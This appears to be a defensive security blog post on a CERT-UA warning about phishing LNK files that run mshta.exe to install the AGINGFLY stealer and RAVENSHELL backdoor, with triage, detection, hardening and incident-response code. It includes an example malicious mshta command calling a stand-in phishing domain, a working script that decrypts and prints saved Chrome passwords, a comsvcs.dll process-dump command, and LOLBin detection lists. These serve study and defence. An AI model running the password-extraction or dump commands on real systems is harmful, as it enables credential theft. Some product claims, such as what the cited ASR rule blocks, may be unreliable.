
Introduction:
Ukraine’s CERT-UA has issued an urgent warning about a new wave of cyberattacks targeting hospitals and government agencies. The campaign uses malicious LNK shortcut files delivered via phishing emails to trigger an infection chain that deploys two distinct payloads: AGINGFLY, a browser and WhatsApp data stealer, and RAVENSHELL, a full-featured remote access trojan enabling credential theft and lateral movement.
Learning Objectives:
- Reconstruct the complete attack chain from LNK file execution to RAVENSHELL backdoor deployment.
- Detect and block abuse of mshta.exe and other living-off-the-land binaries (LOLBins) used in the campaign.
- Implement forensic collection, credential hygiene, and network hardening to mitigate AGINGFLY and RAVENSHELL.
You Should Know:
1. Deconstructing the Attack Chain: LNK → HTA → RAVENSHELL
The attack begins with a phishing email containing a shortcut (.LNK) file. When the user double-clicks the LNK, its target field executes `mshta.exe` with a remote URL pointing to a malicious HTA (HTML Application) file. The HTA script, running in the context of mshta.exe, downloads and executes the RAVENSHELL backdoor, while also fetching AGINGFLY to exfiltrate local browser and WhatsApp data.
Step-by-step guide to understanding and inspecting the LNK vector:
- View the LNK target on Windows (no execution). PowerShell can read the shortcut's command line through the WScript.Shell COM object without launching it:
```powershell
$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut("C:\path\to\malicious.lnk")
Write-Host "Target: " $lnk.TargetPath
Write-Host "Arguments: " $lnk.Arguments
```
- Example malicious LNK target:
`mshta.exe "http://phishing-domain.com/update.hta"`
- What `mshta.exe` does: it interprets the HTA as HTML plus script using the Internet Explorer engine, but as a trusted desktop application rather than a sandboxed web page, so the script can do anything the logged-on user can. The HTA typically contains VBScript or JavaScript that starts `cmd.exe` or PowerShell to download and execute the final payload.
- Detection rule (Sysmon): look for `mshta.exe` spawning `cmd.exe` or `powershell.exe` (Event ID 1, process creation, where ParentImage is mshta.exe) and for `mshta.exe` making outbound connections to non-Microsoft domains (Event ID 3, network connection).
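The PowerShell above relies on the Windows shell to read the shortcut. When the LNK arrives in a mail queue or a Linux-based sandbox, the same fields can be read straight out of the Shell Link binary format. The following Python is an added example, not code from CERT-UA or from the original post: it parses the ShellLinkHeader and STRING_DATA fields (relative path, working directory, arguments), skips the IDList/LinkInfo structures where the absolute target lives, and flags the traits the page describes (a script host such as mshta in the command line, a remote URL, a minimised window). The sample LNK is constructed inside the block so it runs offline; the `LOLBINS` list is a defender-side heuristic, not something taken from the advisory.

```python
import struct

# Shell Link (.lnk) constants from the MS-SHLLINK format; nothing here executes the file.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
FLAG = {"HasLinkTargetIDList": 0x01, "HasLinkInfo": 0x02, "HasName": 0x04, "HasRelativePath": 0x08,
        "HasWorkingDir": 0x10, "HasArguments": 0x20, "HasIconLocation": 0x40, "IsUnicode": 0x80}
SW_SHOWMINNOACTIVE = 7        # ShowCommand value that starts the window minimised (hides a console)
# Defender-side heuristic list (assumption, not from the advisory) of script hosts / LOLBins
# that a document shortcut has no reason to launch
LOLBINS = ("mshta", "powershell", "cmd.exe", "wscript", "cscript", "rundll32", "regsvr32", "certutil")


def build_sample_lnk(rel_path, args, show_cmd=SW_SHOWMINNOACTIVE):
    """Constructed test input: a minimal LNK with an empty IDList, a relative path and arguments."""
    flags = FLAG["HasLinkTargetIDList"] | FLAG["HasRelativePath"] | FLAG["HasArguments"] | FLAG["IsUnicode"]
    # ShellLinkHeader: size, CLSID, flags, attrs, 3 FILETIMEs, filesize, icon index, show cmd, hotkey, reserved
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"            # IDListSize, then only the 2-byte terminator

    def string_data(s):                                      # CountCharacters + UTF-16LE chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + id_list + string_data(rel_path) + string_data(args)


def parse_lnk(data):
    """Read ShowCommand and the STRING_DATA fields (relative path, working dir, arguments)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & FLAG["HasLinkTargetIDList"]:                  # skip IDList; its size field excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG["HasLinkInfo"]:                          # skip LinkInfo; its size field includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    strings = {}
    for name in ("HasName", "HasRelativePath", "HasWorkingDir", "HasArguments", "HasIconLocation"):
        if flags & FLAG[name]:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & FLAG["IsUnicode"] else 1
            raw = data[pos:pos + count * width]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return {"show_command": show_cmd,
            "relative_path": strings.get("HasRelativePath", ""),
            "working_dir": strings.get("HasWorkingDir", ""),
            "arguments": strings.get("HasArguments", "")}


def triage_lnk(data):
    """Return (parsed fields, list of findings) for an LNK read from disk or from an email attachment."""
    info = parse_lnk(data)
    cmdline = f"{info['relative_path']} {info['arguments']}".strip().lower()
    findings = []
    if any(lolbin in cmdline for lolbin in LOLBINS):
        findings.append("shortcut launches a script host / LOLBin: " + cmdline)
    if "http://" in cmdline or "https://" in cmdline:
        findings.append("command line references a remote URL")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised (SW_SHOWMINNOACTIVE), hiding the console from the user")
    return info, findings


if __name__ == "__main__":
    sample = build_sample_lnk(r"..\..\..\Windows\System32\mshta.exe", '"http://phishing-domain.com/update.hta"')
    info, findings = triage_lnk(sample)
    print(info)
    for finding in findings:
        print("  !", finding)
```

A real phishing LNK usually carries the absolute target inside the IDList rather than as a relative path; extend `parse_lnk` with an IDList walker if you need that field, but for gateway triage the arguments string is where the `mshta`/URL combination shows up.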
2. RAVENSHELL: Remote Control, Credential Theft, and Lateral Movement
RAVENSHELL is a modular backdoor that establishes persistence, provides an interactive remote shell, steals credentials (often via `cmd.exe` and `mimikatz` in memory), and moves laterally using native Windows admin tools (WMI, PsExec, scheduled tasks).
Step-by-step guide to identifying RAVENSHELL on a compromised host:
- List suspicious processes and network connections (Windows):
```cmd
tasklist /v | findstr /i "powershell cmd mshta"
netstat -ano | findstr "ESTABLISHED"
```
- Check for unusual scheduled tasks (anything outside the built-in `\Microsoft\` task folders):
```powershell
Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | Format-List TaskName, TaskPath, State, Actions
```
- Examine WMI event subscriptions (often used for persistence); a filter bound to a CommandLineEventConsumer is the classic pattern:
```powershell
Get-CimInstance -Namespace root\subscription -ClassName __EventFilter
Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer
Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding
```
- Lateral movement evidence: look for `wmiprvse.exe` spawning `cmd.exe` or `powershell.exe`. Security Event ID 4688 carries the parent process name in Properties[13] and the new process name in Properties[5] on Windows 10 / Server 2016 and later (process creation auditing must be enabled):
```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} |
  Where-Object { $_.Properties[13].Value -like '*\wmiprvse.exe' -and
                 $_.Properties[5].Value -match 'cmd\.exe$|powershell\.exe$' } |
  Select-Object TimeCreated, @{n='Parent'; e={$_.Properties[13].Value}}, @{n='Child'; e={$_.Properties[5].Value}}
```
- Linux-based log analysis (if forwarding Windows logs):
```bash
grep -Ei "mshta\.exe|ravenshell" /var/log/syslog
```
3. AGINGFLY: Stealing Browser and WhatsApp Data
AGINGFLY specifically targets credential stores in Chromium-based browsers (Chrome, Edge, Brave) and local WhatsApp configuration files. It copies `Login Data`, `Cookies`, and `Web Data` from browser profiles, plus `keyring` and `msgstore.db` from WhatsApp directories.
Step-by-step guide to forensic collection and decryption (defensive perspective):
- Locate browser profile directories (Windows):
```cmd
dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data"
dir "%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data"
```
- Extract encrypted credentials for analysis (requires the decryption key from the same user context). Use `python` with pywin32 (DPAPI) and pycryptodome (AES-GCM); the database is copied first because the browser holds a lock on the live file:
```python
import os, json, base64, shutil, sqlite3
import win32crypt                  # pywin32: DPAPI, must run as the profile's user
from Crypto.Cipher import AES      # pycryptodome

profile = os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data")
shutil.copy(os.path.join(profile, r"Default\Login Data"), "LoginData.copy")   # live DB is locked while Chrome runs

# Chrome 80+ encrypts entries with AES-256-GCM; the key sits in Local State, DPAPI-wrapped, behind a "DPAPI" prefix
with open(os.path.join(profile, "Local State"), encoding="utf-8") as f:
    wrapped_key = base64.b64decode(json.load(f)["os_crypt"]["encrypted_key"])[5:]
aes_key = win32crypt.CryptUnprotectData(wrapped_key)[1]       # returns (description, data)

def decrypt(blob):
    if blob.startswith(b"v10"):    # "v10" | 12-byte nonce | ciphertext | 16-byte GCM tag
        cipher = AES.new(aes_key, AES.MODE_GCM, nonce=blob[3:15])
        return cipher.decrypt_and_verify(blob[15:-16], blob[-16:]).decode()
    # pre-80 entries are DPAPI-only; "v20" app-bound entries of recent Chrome builds are not handled here
    return win32crypt.CryptUnprotectData(blob)[1].decode()

conn = sqlite3.connect("LoginData.copy")
for url, user, pw in conn.execute("SELECT action_url, username_value, password_value FROM logins"):
    print(f"URL: {url}, User: {user}, Pass: {decrypt(pw)}")
```
- WhatsApp local storage path (Windows):
`%APPDATA%\WhatsApp\Local Storage\leveldb\` contains plaintext messages in `.log` files.
Detection: monitor for processes reading `.log` or `.db` files inside WhatsApp directories from non-WhatsApp binaries.
4. Blocking mshta.exe Abuse via Attack Surface Reduction (ASR) and AppLocker
The most effective mitigation against this LNK‑to‑HTA chain is disabling or restricting `mshta.exe` for non‑administrative workflows.
Step-by-step guide to deploying an ASR rule (Windows 10/11 Pro/Enterprise):
- Enable the ASR rule "Block executable files from running unless they meet a prevalence, age, or trusted list criterion" (Rule ID 01443614-cd74-433a-b99e-2ecdc07bfc25); it blocks `mshta.exe` from launching script content:
```powershell
Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Enabled
```
- Alternative: deny mshta via AppLocker (Executable Rules). `New-AppLockerPolicy` only generates Allow rules, so a Deny rule is written as policy XML and merged with `Set-AppLockerPolicy`. Merge it into a policy that already contains the default Allow rules: an enforced Exe collection blocks every executable that no rule allows, and Deny rules override Allow rules, so the `%WINDIR%` default rule does not rescue mshta. AppLocker enforcement also requires the Application Identity service to be running.
```powershell
New-Item -ItemType Directory -Force -Path C:\Policies | Out-Null
@'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <!-- Id: any unique GUID, e.g. from New-Guid; S-1-1-0 is Everyone -->
    <FilePathRule Id="9c3d2b1a-5e4f-4a6b-8c7d-0e1f2a3b4c5d" Name="Deny mshta.exe" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="%SYSTEM32%\mshta.exe" />
      </Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
'@ | Set-Content -Path C:\Policies\DenyMshta.xml
Set-AppLockerPolicy -XmlPolicy C:\Policies\DenyMshta.xml -Merge
```
- Monitoring for attempted mshta execution (Sysmon): Event ID 1 (process creation) with `Image: C:\Windows\System32\mshta.exe`. Also monitor Event ID 3 (network connection) for `mshta.exe` connecting to untrusted IPs.
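The detections scattered through this page (the Sysmon rule under the attack chain, the `wmiprvse.exe` parent check under RAVENSHELL, the WhatsApp file-access detection under AGINGFLY, and the mshta monitoring just above, which is also what the EDR tuning section later asks for) are the same kind of logic: a condition over a normalised event. The Python below is an added example, not tooling from CERT-UA or from the original post, that implements all of them over a handful of constructed Sysmon (EID 1, 3) and Security (EID 4688, 4663) records. The field names `source`, `id`, `image`, `parent_image`, `dest_host`, `process` and `object` are assumptions; map your SIEM's schema onto them. Note that EID 4663 only exists when a SACL (object-access auditing) is set on the browser and WhatsApp folders.

```python
# Normalised event records, constructed for this example (user name, hosts and IPs are invented).
EVENTS = [
    {"source": "sysmon", "id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"source": "sysmon", "id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe"},
    {"source": "sysmon", "id": 3, "image": r"C:\Windows\System32\mshta.exe",
     "dest_host": "phishing-domain.com", "dest_ip": "203.0.113.10"},
    {"source": "sysmon", "id": 3, "image": r"C:\Windows\System32\mshta.exe",
     "dest_host": "download.microsoft.com", "dest_ip": "198.51.100.5"},
    {"source": "security", "id": 4688, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\wmiprvse.exe"},
    {"source": "security", "id": 4663, "process": r"C:\Windows\System32\cmd.exe",
     "object": r"C:\Users\nurse\AppData\Roaming\WhatsApp\Local Storage\leveldb\000003.log"},
    {"source": "security", "id": 4663, "process": r"C:\Users\nurse\AppData\Local\WhatsApp\WhatsApp.exe",
     "object": r"C:\Users\nurse\AppData\Roaming\WhatsApp\Local Storage\leveldb\000003.log"},
    {"source": "security", "id": 4663, "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "object": r"C:\Users\nurse\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"source": "sysmon", "id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = {"mshta.exe", "wmiprvse.exe"}                 # parents that should not be spawning shells
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
TRUSTED_SUFFIXES = (".microsoft.com", ".windowsupdate.com")  # the page's "non-Microsoft domain" test
# Credential / message stores named on the page and the only processes expected to read them
PROTECTED_STORES = {
    r"\google\chrome\user data\default\login data": {"chrome.exe"},
    r"\microsoft\edge\user data\default\login data": {"msedge.exe"},
    r"\whatsapp\local storage\leveldb": {"whatsapp.exe"},
}


def basename(path):
    """Lower-case file name of a Windows path, independent of the analysis host's OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(ev):
    """Return [(severity, reason), ...] for one event; an empty list means nothing to report."""
    findings = []
    kind = (ev["source"], ev["id"])
    if kind in {("sysmon", 1), ("security", 4688)}:          # process creation with parent
        image, parent = basename(ev["image"]), basename(ev.get("parent_image", ""))
        if image == "mshta.exe":
            findings.append(("medium", f"mshta.exe started by {parent or 'unknown parent'}"))
        if parent in SCRIPT_HOSTS and image in SHELLS:
            findings.append(("high", f"{parent} spawned {image}: HTA script or WMI lateral movement"))
    elif kind == ("sysmon", 3):                               # network connection
        image, host = basename(ev["image"]), ev.get("dest_host", "").lower()
        if image == "mshta.exe" and not host.endswith(TRUSTED_SUFFIXES):
            findings.append(("high", f"mshta.exe connected to non-Microsoft host {host or ev.get('dest_ip')}"))
    elif kind == ("security", 4663):                          # object access (needs a SACL on the folder)
        image, obj = basename(ev["process"]), ev["object"].lower()
        for fragment, owners in PROTECTED_STORES.items():
            if fragment in obj and image not in owners:
                findings.append(("high", f"{image} read protected store {ev['object']}"))
    return findings


def triage(events):
    """Flatten findings across a batch of events as (event index, severity, reason)."""
    return [(i, sev, why) for i, ev in enumerate(events) for sev, why in evaluate(ev)]


if __name__ == "__main__":
    for idx, sev, why in triage(EVENTS):
        print(f"[{sev:6}] event {idx}: {why}")
```

The bare `mshta.exe` start is rated medium rather than high because some legitimate installers still use HTAs; the parent/child and network conditions are what turn it into an incident.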
5. Lateral Movement Containment & Credential Hardening
RAVENSHELL spreads using stolen credentials via WMI, RDP, and SMB. Blocking these vectors severely limits the backdoor’s reach.
Step-by-step guide to hardening against lateral movement:
- Restrict inbound RDP to specific IP ranges (Windows Firewall). An explicit Block rule always wins over an Allow rule, so a "block all, then allow the subnet" pair would block the admin subnet too; instead disable the built-in Remote Desktop allow rules and add one Allow rule scoped to the admin subnet (the profile's default inbound action, Block, covers everything else):
```powershell
Set-NetFirewallRule -DisplayGroup "Remote Desktop" -Enabled False
New-NetFirewallRule -DisplayName "Allow RDP from admin subnet" -Direction Inbound -Protocol TCP -LocalPort 3389 -RemoteAddress 192.168.1.0/24 -Action Allow
```
- Disable SMBv1 and restrict SMB outbound (prevents pass-the-hash):
```powershell
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Workstations rarely need SMB to other workstations; scope RemoteAddress to your client ranges
# (10.10.0.0/16 is an example) so file servers stay reachable.
New-NetFirewallRule -DisplayName "Block outbound SMB to workstation subnets" -Direction Outbound -Protocol TCP -RemotePort 445 -RemoteAddress 10.10.0.0/16 -Action Block
```
- Enable Windows Defender Credential Guard (requires Hyper-V / virtualization-based security). It is configured through the registry and takes effect after a reboot:
```powershell
$dg = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard'
Set-ItemProperty -Path $dg -Name EnableVirtualizationBasedSecurity -Value 1 -Type DWord
Set-ItemProperty -Path $dg -Name RequirePlatformSecurityFeatures -Value 1 -Type DWord   # 1 = Secure Boot, 3 = Secure Boot + DMA protection
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name LsaCfgFlags -Value 1 -Type DWord   # 1 = enabled with UEFI lock, 2 = without lock
Restart-Computer
# After the reboot, a 1 in SecurityServicesRunning means Credential Guard is active
(Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard).SecurityServicesRunning
```
- Detect lateral movement using `net use` and `wmic` logs: Security Event ID 5140 (network share accessed) and 4688 (wmic.exe process creation).
6. Incident Response Checklist for Healthcare & Government Networks
When a suspected AGINGFLY/RAVENSHELL infection is identified, follow this IR checklist to contain and eradicate.
Step-by-step guide:
- Isolate the host: disconnect the network cable or disable the NIC via PowerShell:
```powershell
Disable-NetAdapter -Name "Ethernet" -Confirm:$false
```
- Capture memory (for later analysis of RAVENSHELL's in-memory payload). The built-in comsvcs.dll MiniDump export dumps a single process, so supply the PID of the suspicious process; full-RAM acquisition needs a dedicated memory imaging tool:
```cmd
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\memory.dmp full
```
- Collect artifacts: the LNK file, the HTA cache (`%temp%\hta`), copies of browser `Login Data`, and the WhatsApp `leveldb` folder.
- Terminate malicious processes, identified by parent process `mshta.exe` or unusual network beaconing. `Get-Process` exposes `.Parent` only in PowerShell 7, so the CIM query below also works on Windows PowerShell 5.1:
```powershell
Get-CimInstance Win32_Process |
  Where-Object { (Get-Process -Id $_.ParentProcessId -ErrorAction SilentlyContinue).Name -eq 'mshta' } |
  ForEach-Object { Stop-Process -Id $_.ProcessId -Force }
```
- Reset all credentials for affected user accounts and assume they are stolen. Revoke session tokens and force a password reset.
- Scan for lateral movement: query event logs for successful logons (Event ID 4624) from the compromised host to other systems.
7. Proactive Defenses: Email Filtering, YARA Rules, and EDR Tuning
Prevention is far cheaper than recovery. Configure email gateways to block `.lnk` attachments, deploy YARA rules to detect RAVENSHELL, and tune EDR for the specific behaviors.
Step-by-step guide:
- Email filter rule (Exchange / Mimecast): block any attachment with extension `.lnk`, `.hta`, `.iso`, or `.vbe`. Also block emails containing URLs with `mshta` in the path.
- YARA rule to detect RAVENSHELL strings (example):
```yara
rule RAVENSHELL_Backdoor
{
    strings:
        $s1 = "RAVENSHELL" ascii wide
        $s2 = "C2_Beacon" ascii
        $s3 = "Steal_Browser_Data" ascii
    condition:
        any of them
}
```
- EDR custom detection: alert when `mshta.exe` makes an HTTP request to a domain with low reputation or when `cmd.exe` reads `Login Data` from a browser profile.
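The email filter rule above is stated as a gateway policy; the Python below is an added example, not code from CERT-UA or from the original post, showing what that policy has to do against a real MIME message using only the standard library: walk the parts, take the final extension of every attachment filename (so `Roster.pdf.lnk` is caught), and check the path component of every URL in the text bodies for `mshta`. The two messages are constructed inside the block (addresses, subject and attachment bytes are invented) so it runs offline.

```python
import email
import re
from email import policy
from email.message import EmailMessage

BLOCKED_EXTENSIONS = {".lnk", ".hta", ".iso", ".vbe"}          # extensions named on the page
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def build_sample_email(malicious):
    """Constructed test messages; the addresses, subject and attachment bytes are invented."""
    m = EmailMessage()
    m["From"] = "rota@example.invalid"
    m["To"] = "ward@example.invalid"
    m["Subject"] = "Updated duty roster"
    if malicious:
        m.set_content("Roster attached. If it will not open, use http://phishing-domain.com/mshta/update.hta")
        # Double extension so the name looks like a PDF; a LNK header size field plus zero padding stands in for a body
        m.add_attachment(b"\x4c\x00\x00\x00" + bytes(72), maintype="application",
                         subtype="octet-stream", filename="Roster.pdf.lnk")
    else:
        m.set_content("Roster attached as PDF. Portal: https://intranet.example.invalid/rota")
        m.add_attachment(b"%PDF-1.4 constructed", maintype="application", subtype="pdf", filename="Roster.pdf")
    return m.as_bytes()


def risky_attachments(msg):
    """Filenames whose final extension is blocked; catches double extensions such as Roster.pdf.lnk."""
    hits = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = name[name.rfind("."):] if "." in name else ""
        if ext in BLOCKED_EXTENSIONS:
            hits.append(name)
    return hits


def mshta_urls(msg):
    """URLs in text bodies whose path component (after the host) contains 'mshta'."""
    hits = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            for url in URL_RE.findall(part.get_content()):
                path = url.split("/", 3)[3] if url.count("/") >= 3 else ""
                if "mshta" in path.lower():
                    hits.append(url)
    return hits


def verdict(raw_bytes):
    """Gateway decision for one RFC 5322 message: ('block' | 'allow', reasons)."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    reasons = [f"blocked attachment extension: {name}" for name in risky_attachments(msg)]
    reasons += [f"mshta in URL path: {url}" for url in mshta_urls(msg)]
    return ("block" if reasons else "allow"), reasons


if __name__ == "__main__":
    for label in (True, False):
        print("malicious" if label else "benign", verdict(build_sample_email(label)))
```

Extension matching on the filename alone is what the page's rule specifies; a gateway should additionally sniff the attachment bytes (the `L\x00\x00\x00` header size of a Shell Link, the ISO 9660 signature) so a renamed `.lnk` inside a `.zip` or with a stripped extension does not slip past.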
What Undercode Say:
- Key Takeaway 1: The combination of AGINGFLY (data stealer) and RAVENSHELL (backdoor) shows that attackers are moving toward multi-payload campaigns that both exfiltrate sensitive information and maintain persistent remote access, making recovery harder and a data breach inevitable if not detected early.
- Key Takeaway 2: Using `mshta.exe` as the initial infection vector is a classic "living-off-the-land" technique that bypasses many legacy antivirus solutions. Blocking or strictly controlling LOLBins like `mshta`, `wmic`, and `cscript` should be a baseline security control in healthcare and government environments.
Analysis: CERT-UA’s warning highlights a dangerous trend – targeting hospitals under active war conditions. The attack chain is not zero‑day but relies on social engineering and poor default configurations (e.g., allowing HTA execution). Organizations must move beyond signature‑based detection and implement behavior monitoring for process ancestry (e.g., `mshta` spawning cmd). Additionally, browser and messaging app data theft indicates that traditional perimeter defenses are insufficient; endpoint data classification and strict application control are now mandatory.
Prediction:
As war‑related cyber operations intensify, we will see more “fileless” infection chains using native Windows components to evade EDR. Attackers will increasingly combine stealer modules (like AGINGFLY) with RATs (like RAVENSHELL) to monetize access rapidly before lateral movement is blocked. Expect future variants to target Signal and Telegram desktop apps, and to use encrypted C2 channels over WebSocket to bypass network detection. Healthcare IT teams must adopt a zero‑trust model where no binary – not even `mshta.exe` – is trusted by default.
Reported By: Hackermohitkumar Ukraines – Hackers Feeds


